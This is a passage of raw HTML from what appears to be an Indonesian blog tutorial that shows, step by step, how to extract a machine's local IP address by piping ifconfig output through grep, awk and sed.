overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# ifconfig wlan0&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;wlan0 &amp;nbsp; &amp;nbsp; Link encap:Ethernet &amp;nbsp;HWaddr 00:24:36:5c:ed:e3 &amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;inet addr:192.168.1.7&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt; &amp;nbsp;Bcast:192.168.1.255 &amp;nbsp;Mask:255.255.255.0&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; inet6 addr: fe80::224:36ff:fe5c:ede3/64 Scope:Link&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; UP BROADCAST RUNNING MULTICAST &amp;nbsp;MTU:1500 &amp;nbsp;Metric:1&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; RX packets:96332 errors:0 dropped:0 overruns:0 frame:0&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; TX packets:41418 errors:0 dropped:0 overruns:0 carrier:0&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; collisions:0 txqueuelen:1000&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; RX bytes:49392027 (49.3 MB) &amp;nbsp;TX bytes:7373200 (7.3 MB)&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita telah mendapatkan konfigurasi IP dari wlan0. Langkah selanjutnya adalah menggunakan perintah grep. Masukan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;ifconfig wlan0 | grep "inet addr:"&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perintah grep akan mencari string "inet addr:" pada output ifconfig wlan0.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-2X4WfgXuZPU/TyOJIRLBV4I/AAAAAAAABLU/1aaml9zoUvU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://1.bp.blogspot.com/-2X4WfgXuZPU/TyOJIRLBV4I/AAAAAAAABLU/1aaml9zoUvU/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Output:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/span&gt;&amp;nbsp;ifconfig wlan0 | grep "inet addr:"&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;inet addr:192.168.1.7 &amp;nbsp;Bcast:192.168.1.255 &amp;nbsp;Mask:255.255.255.0&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ok. Sekarang output kita semakin berkurang, dari 7 baris, menjadi 1 baris saja. Lalu, bagaimana caranya agar output menghasilkan &lt;b&gt;192.168.1.7&lt;/b&gt; ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;2. Awk&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Langkah selanjutnya adalah menyingkirkan inet, Bcast, dan Mask. Kita akan menggunakan perintah awk. Perintah awk akan memilih text yang berada pada kolom tertentu. Dalam output di atas, kolom 1 bernilai : inet. Dipisahkan oleh spasi terdapat kolom 2, yaitu addr:192.168.1.7. Dipisahkan oleh spasi teradapat kolom 3, yaitu Bacst:192.168.1.255. Dan dipisahkan oleh spasi terdapat kolom terakhir, yaitu Mask:255.255.255.0. Kita akan memilih kolom ke dua, sehingga ouput kita akan menampilkan value dari kolom ke 2. Masukan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;span class="Apple-style-span" style="color: red;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--lfCbl7fv-o/TyOJPlffgwI/AAAAAAAABLc/cO0RzpCEIec/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://4.bp.blogspot.com/--lfCbl7fv-o/TyOJPlffgwI/AAAAAAAABLc/cO0RzpCEIec/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;awk '{print $2}' akan menampilkan nilai dari kolom ke dua, yaitu addr:192.168.1.7. Terlihat dari output kita di bawah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Output:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;addr:192.168.1.7&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ok, sekarang hasil kita semakin sedikit. Kali ini kita akan menyingkirkan addr: untuk mendapatkan output berupa IP address.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;3. Sed&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Langkah berikutnya adalah menyingkirkan string addr: dari output kita, sehingga kita mendapatkan output 192.168.1.7. Untuk menyingkirkan string tertentu, perintah sed adalah &lt;span class="Apple-style-span" style="color: lime;"&gt;sed 's/&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;[STRING YANG AKAN DIHAPUS]&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;//'&lt;/span&gt; Masukan perintah berikut:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perintah di atas akan menghapus string addr:, maka output yang akan terlihat adalah.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-8vpGUeWSNq0/TyOJVbK11VI/AAAAAAAABLk/aKDk9Z6g2wY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://2.bp.blogspot.com/-8vpGUeWSNq0/TyOJVbK11VI/AAAAAAAABLk/aKDk9Z6g2wY/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Output:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: 